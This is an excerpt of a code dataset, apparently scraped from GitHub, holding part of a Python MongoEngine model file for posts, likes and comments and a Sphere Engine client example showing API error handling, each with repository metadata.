userId = mdb.ReferenceField(User)
publicId = mdb.UUIDField()
text = mdb.StringField()
# name = mdb.StringField()
createdOn = mdb.DateField(default=datetime.datetime.now())
class Post(mdb.Document):
userId = mdb.ReferenceField(User)
publicId = mdb.UUIDField()
text = mdb.StringField()
name = mdb.StringField(default="")
postImage = mdb.StringField(default="")
likes = mdb.ListField(mdb.EmbeddedDocumentField(Likes))
comments = mdb.ListField(mdb.EmbeddedDocumentField(Comments))
createdOn = mdb.DateField(default=datetime.datetime.now()) | [
"almeidacclive@gmail.com"
] | almeidacclive@gmail.com |
fbc081707ef66f98e229cca660ba24a576af8e5f | 479bf0773eb6b3e80a7257b15b9f203f68707669 | /Examples/V3/problems/problems/updateProblemErrorHandling.py | 258a7c614d7829c23e9bd3352cb41efa31453580 | [] | no_license | rucamedia/python-client | 56fa82c81452e9560d1eb7b5d295896391bf882f | 2b9ddbea0f9173754dfeb4f4e651a7c5a275bf52 | refs/heads/master | 2020-03-29T10:40:08.261883 | 2018-08-30T10:47:25 | 2018-08-30T10:47:25 | 149,817,070 | 1 | 0 | null | 2018-09-21T20:55:50 | 2018-09-21T20:55:50 | null | UTF-8 | Python | false | false | 1,134 | py | """
Example presents error handling for problems.update() API method
"""
from sphere_engine import ProblemsClientV3
from sphere_engine.exceptions import SphereEngineException
# define access parameters
accessToken = '<access_token>'
endpoint = '<endpoint>'
# initialization
client = ProblemsClientV3(accessToken, endpoint)
# API usage
problemCode = 'NONEXISTING_CODE'
newProblemName = 'New example problem name'
try:
response = client.problems.update(problemCode, newProblemName)
except SphereEngineException as e:
if e.code == 401:
print('Invalid access token')
elif e.code == 403:
print('Access to the problem is forbidden')
elif e.code == 400:
# aggregates two possible reasons of 400 error
# empty problem code, empty problem name
print('Bad request (empty problem code, empty problem name), details available in the message: ' + str(e))
elif e.code == 404:
# aggregates two possible reasons of 404 error
# non existing problem or masterjudge
print('Non existing resource (problem, masterjudge), details available in the message: ' + str(e))
| [
"lewon.robert@gmail.com"
] | lewon.robert@gmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.